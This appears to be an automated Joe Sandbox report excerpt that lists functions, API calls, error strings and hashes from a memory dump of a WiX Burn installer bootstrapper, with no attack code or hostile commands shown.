WiX\Burn, xrefs: 009D6551

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: 7c62d5d4cbdd631b2d29b1daf16ec12c33c580f5c964c545d4c84327405f8067
Instruction ID: 1844f9c0021fab6ec7a2ce4a167787202f877a02f0cf3da33469f0310f2c83df
Opcode Fuzzy Hash: 7c62d5d4cbdd631b2d29b1daf16ec12c33c580f5c964c545d4c84327405f8067
Instruction Fuzzy Hash: DB513772D40219BFDF12DFA4CC45AAEBBBDEB48710F018166FA14E6250E735CA51DBA0

Function 00999EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00999EED
_MREFOpen@16.MSPDB140-MSVCRT ref: 00999F12

Strings

Failed to get component path: %d, xrefs: 00999F76
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0099A006
Failed to format product code string., xrefs: 00999F1D
Failed to format component id string., xrefs: 00999EF8
Failed to set variable., xrefs: 00999FF6

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: c6cf459f42b34758c1fecdaa3969c56fe8bfe5bec0477f5ffd3e847fac1f1690
Instruction ID: dada94e849732d246cbc2407323c297998366501a73637f4bf3154291095cecf
Opcode Fuzzy Hash: c6cf459f42b34758c1fecdaa3969c56fe8bfe5bec0477f5ffd3e847fac1f1690
Instruction Fuzzy Hash: 0241F432940115BADF21AAAC8C46FBEF76CEF95310F24861BF515E6290E731AE40D791

Function 0099F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0099F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0099F94F

Strings

%ls.RebootRequired, xrefs: 0099F82F
Resume, xrefs: 0099F8B6
Failed to format pending restart registry key to read., xrefs: 0099F846
Failed to open registration key., xrefs: 0099F8AB
Failed to read Resume value., xrefs: 0099F8D8

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: d3aa57ef54807c732d8db688e5348208777dd8d65d9ee355b6570e3c65d4c265
Instruction ID: 15946f0d4c2064da3dd586870e6caefbe28923bba21ac875808d410ff8ca0ea7
Opcode Fuzzy Hash: d3aa57ef54807c732d8db688e5348208777dd8d65d9ee355b6570e3c65d4c265
Instruction Fuzzy Hash: B4413972940159FFCF129F9DC891BADFBA8EB44310F658176E911EB210C375AE419B50

Function 009AAA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to determine length of source path., xrefs: 009AAA30
Failed to set last source., xrefs: 009AAAF0
Failed to determine length of relative path., xrefs: 009AAA4D
Failed to trim source folder., xrefs: 009AAA95
WixBundleLastUsedSource, xrefs: 009AAA9F, 009AAAA5, 009AAAE1

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: 3d26be58474915ad608319773532db641afe727d20a4c8c038c9de05200f44dd
Instruction ID: 81fe854bd85710d96999087763677dc61ba9b5774af2e8567bc073ebc22244e3
Opcode Fuzzy Hash: 3d26be58474915ad608319773532db641afe727d20a4c8c038c9de05200f44dd
Instruction Fuzzy Hash: C031C832944169BFCF229A98CD41F9EBBBAEB41720F114256F920B72D0DB719D40D7D1

Function 009BD8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(009F0C4C,00000000,00000017,009F0C5C,?,?,00000000,00000000,?,?,?,?,?,009BDEE7,00000000,00000000), ref: 009BD8E8

Strings

WixBurn, xrefs: 009BD913
Failed to set progress timeout., xrefs: 009BD952
Failed to set BITS job to foreground., xrefs: 009BD969
Failed to create IBackgroundCopyManager., xrefs: 009BD8F4
Failed to set notification flags for BITS job., xrefs: 009BD93A
Failed to create BITS job., xrefs: 009BD922

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: ff9da07b8779c0bdaff8cce64ca68180c30c6d6c866218431ed5fa691c582564
Instruction ID: 8d8dc5d60ec472b20a5a5ce22836d3ef1e3f0903c8765499f1b14666c83e4f60
Opcode Fuzzy Hash: ff9da07b8779c0bdaff8cce64ca68180c30c6d6c866218431ed5fa691c582564
Instruction Fuzzy Hash: D631A331F42319AF9B14DBA8C955EBFBBB8AF88720B000559EA05EB351DA309C058BD0

Function 009D5DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 009D5DF8
GetLastError.KERNEL32 ref: 009D5E05
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 009D5E4C
GetLastError.KERNEL32 ref: 009D5E80
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 009D5EB4

Strings

%ls.R, xrefs: 009D5DCC
dlutil.cpp, xrefs: 009D5E29, 009D5EA4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID: %ls.R$dlutil.cpp
API String ID: 3160720760-657863730
Opcode ID: 5c517e53d28cd4735648b596dbe1f5ad7f5f0d567b04c68d4f4a20df930f8107
Instruction ID: 5ab55cb7160c741bfbbb6f17c18977238e08faf666384234cddc57f11ed37ece
Opcode Fuzzy Hash: 5c517e53d28cd4735648b596dbe1f5ad7f5f0d567b04c68d4f4a20df930f8107
Instruction Fuzzy Hash: 1E31E772982624BBDB209F95CC45B6E7BA8AF44761F128216FE01EB3C0D7709E0097B0

Function 0099C8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0099E444,000000FF,00000000,00000000,0099E444,?,?,0099DBEB,?,?,?,?), ref: 0099CD89

CreateFileW.KERNEL32(E9009DBA,80000000,00000005,00000000,00000003,08000000,00000000,009953C5,?,00000000,840F01E8,14680A79,00000001,009953BD,00000000,00995489), ref: 0099C956
GetLastError.KERNEL32(?,?,?,009A7809,0099566D,00995479,00995479,00000000,?,00995489,FFF9E89D,00995489,009954BD,00995445,?,00995445), ref: 0099C99B

Strings

Failed to get catalog local file path, xrefs: 0099C9D9
catalog.cpp, xrefs: 0099C9BC
Failed to find payload for catalog file., xrefs: 0099C9E0
Failed to open catalog in working path: %ls, xrefs: 0099C9C9
Failed to verify catalog signature: %ls, xrefs: 0099C994

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-48089280
Opcode ID: c05a2f487cab9f5c9b31ddb159ecf5bd1262dbe3a2a85e196d85488a5139e8bd
Instruction ID: e897e3f925b084d3c6527eea8a154d3d1abf14ebc901275588591ce452b42c3d
Opcode Fuzzy Hash: c05a2f487cab9f5c9b31ddb159ecf5bd1262dbe3a2a85e196d85488a5139e8bd
Instruction Fuzzy Hash: 6E31D3B2941625BFDF219B5CCC02B59BBA4EF04760F218666F905EB280E771AD509BD0

Function 009BD33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,755730B0,00000000,?,?,?,?,009BD642,?), ref: 009BD357
ReleaseMutex.KERNEL32(?,?,?,?,009BD642,?), ref: 009BD375
WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BD3B6
ReleaseMutex.KERNEL32(?), ref: 009BD3CD
SetEvent.KERNEL32(?), ref: 009BD3D6

Strings

Failed to get message from netfx chainer., xrefs: 009BD3F7
Failed to send files in use message from netfx chainer., xrefs: 009BD41C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: 3307cd7054ae270c9f0ca22261b8ee47c70c36db10fece151b6e4dbe8590c08c
Instruction ID: 339d87db5fdcaa476139ffbde5e1ccca1527c12db1bbddb2cc149b18337e2604
Opcode Fuzzy Hash: 3307cd7054ae270c9f0ca22261b8ee47c70c36db10fece151b6e4dbe8590c08c
Instruction Fuzzy Hash: F231D732905609FFCB119F94DC08EEEBBF9EF85330F108266F565E22A1D73099509B90

Function 009D093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 009D09AB
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 009D09B5
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 009D09FE
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 009D0A0B

Strings

D, xrefs: 009D0993
"%ls" %ls, xrefs: 009D0974
procutil.cpp, xrefs: 009D09D9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: bda6ddfd5961da3729c74e2780c6bea69ebdf7549546fd01fc57735770f8dcca
Instruction ID: d8fe5c582f83e5444792981701fdbb74635e6599d25890fae71954a9b09d6945
Opcode Fuzzy Hash: bda6ddfd5961da3729c74e2780c6bea69ebdf7549546fd01fc57735770f8dcca
Instruction Fuzzy Hash: 4C216D72D8121EEBDB10DFE9CD41AAEBBB8EF44750F11402AEA00B7311D3709E409BA1

Function 00999B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00999BB3
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0099A8AB,00000100,000002C0,000002C0,00000100), ref: 00999BD3
GetLastError.KERNEL32(?,0099A8AB,00000100,000002C0,000002C0,00000100), ref: 00999BDE

Strings

Failed to format variable string., xrefs: 00999BBE
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00999C4A
Failed while searching directory search: %ls, for path: %ls, xrefs: 00999C34
Failed to set directory search path variable., xrefs: 00999C0F

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: ab352da44cc81490b28552a187b1332757300eccdcbe8ce4d28cb3ffdd8b9883
Instruction ID: 3582da66bf843094ceaf2b1afe920d1de22141c14978934639c2cac601024e09
Opcode Fuzzy Hash: ab352da44cc81490b28552a187b1332757300eccdcbe8ce4d28cb3ffdd8b9883
Instruction Fuzzy Hash: 9D212B33D81025FBCF2226DC8D02B5DBB68AF40760F25420AFD547B251E7359E90A7D9

Function 00999D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00999D64
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0099A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00999D84
GetLastError.KERNEL32(?,0099A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00999D8F

Strings

Failed to set variable to file search path., xrefs: 00999DE7
Failed while searching file search: %ls, for path: %ls, xrefs: 00999DBD
Failed to format variable string., xrefs: 00999D6F
File search: %ls, did not find path: %ls, xrefs: 00999DF3

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: 2f50e8edef0c12f57b9860d03304ba7d4169288319d4df23dd737505fe7db32d
Instruction ID: 93d7bfdd382334e0bac36a58d62aba4d2018f22faa41dc966358f4264094885b
Opcode Fuzzy Hash: 2f50e8edef0c12f57b9860d03304ba7d4169288319d4df23dd737505fe7db32d
Instruction Fuzzy Hash: 57112733885125F7DF2267DCCD42BADBB299F54720F21420AFD10B62A0E7325E50A6D1

Function 009ACF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,009AD365,00000000,?,?,009AC7C9,00000001,?,?,?,?,?), ref: 009ACF37
GetLastError.KERNEL32(?,?,009AD365,00000000,?,?,009AC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009ACF41
GetExitCodeThread.KERNEL32(00000001,?,?,?,009AD365,00000000,?,?,009AC7C9,00000001,?,?,?,?,?,00000000), ref: 009ACF7D
GetLastError.KERNEL32(?,?,009AD365,00000000,?,?,009AC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009ACF87

Strings

Failed to wait for cache thread to terminate., xrefs: 009ACF6F
Failed to get cache thread exit code., xrefs: 009ACFB5
elevation.cpp, xrefs: 009ACF65, 009ACFAB

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 60ab0c4c4ac8f8af9a1deb94329850c4232f141bba73f818e98d3903c1283969
Instruction ID: c709769b144298932ce21915cce23877f71b9225bd8aa8667b2abea32279c553
Opcode Fuzzy Hash: 60ab0c4c4ac8f8af9a1deb94329850c4232f141bba73f818e98d3903c1283969
Instruction Fuzzy Hash: 040149B3A86639AB8B315BC68C09A5FBB489F05BB1B020126BF04BF180E7508C0091E4

Function 009A69AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,009A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009A69BB
GetLastError.KERNEL32(?,009A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009A69C5
GetExitCodeThread.KERNEL32(00000001,00000000,?,009A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009A6A04
GetLastError.KERNEL32(?,009A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009A6A0E

Strings

Failed to wait for cache thread to terminate., xrefs: 009A69F6
Failed to get cache thread exit code., xrefs: 009A6A3F
core.cpp, xrefs: 009A69EC, 009A6A35

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 13b5069b9fcd0c508fcee1962ff0984e1ad83cc46e3b4ce95f3e44a38fdd31f9
Instruction ID: e86a693fddcb7e6db6fb5990ae7e15f099837a4208c3dd01e136ba5214a5270a
Opcode Fuzzy Hash: 13b5069b9fcd0c508fcee1962ff0984e1ad83cc46e3b4ce95f3e44a38fdd31f9
Instruction Fuzzy Hash: DB11C87178520AFBDF00DFA6DE06B6E37ACEB40751F204169B914E91A0EB35CE40A7A4

Function 009AF7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009AF7EE
LeaveCriticalSection.KERNEL32(?), ref: 009AF8FB

Strings

Failed to set source path for container., xrefs: 009AF8E0
Failed to set source path for payload., xrefs: 009AF88A
Engine is active, cannot change engine state., xrefs: 009AF808
UX requested unknown container with id: %ls, xrefs: 009AF8BA
UX denied while trying to set source on embedded payload: %ls, xrefs: 009AF870
UX requested unknown payload with id: %ls, xrefs: 009AF85A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: 8d7866b4c5cdb154205a0b60090c2de5c47d9a1e052747d1589cbb650b0dabf8
Instruction ID: 7d04c4e927ebfa0b204e1c7bed10313a3f512dd2b432d5720002ecd580c59b50
Opcode Fuzzy Hash: 8d7866b4c5cdb154205a0b60090c2de5c47d9a1e052747d1589cbb650b0dabf8
Instruction Fuzzy Hash: 62313532A44255AF8B219BDCCC55E5AB7ACAF86720B15806AF802EB340DB7CED0097D1

Function 009971FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00997210

Strings

[]{}, xrefs: 0099723A
Failed to append escape sequence., xrefs: 009972A3
Failed to format escape sequence., xrefs: 009972AA
Failed to copy string., xrefs: 009972C4
Failed to allocate buffer for escaped string., xrefs: 00997227
Failed to append characters., xrefs: 0099729C
[\%c], xrefs: 0099726F

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: 1fe8c253312052511175cc7ddf5c08ecfd2e7983bc501a533a8f5ccfef4e019d
Instruction ID: cf8be7c9c9efa53881be33d3a9a60808e38dfc5d29c29e715c83e3caac0f0009
Opcode Fuzzy Hash: 1fe8c253312052511175cc7ddf5c08ecfd2e7983bc501a533a8f5ccfef4e019d
Instruction Fuzzy Hash: 7C21D5729AD21ABBDF2157DC8C42BAEB7A99F50B25F204156F910B6280DF759E00D2A0

Function 009B5BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,009DB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,009B67DE,?,00000001,?,009DB4A0), ref: 009B5C45

Strings

feclient.dll, xrefs: 009B5C3B, 009B5D65
Failed grow array of ordered patches., xrefs: 009B5CDE
Failed to copy target product code., xrefs: 009B5D78
Failed to insert execute action., xrefs: 009B5C9A
Failed to plan action for target product., xrefs: 009B5CF0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: 832ec5ec8b0af513e82fe984c8c6ff6593a1fcdb3d89bd09fd72f28fa8c93742
Instruction ID: 342001d6e0684ce35bfef9d1cf60f57eec1dde9a561aec08b804432de0a50645
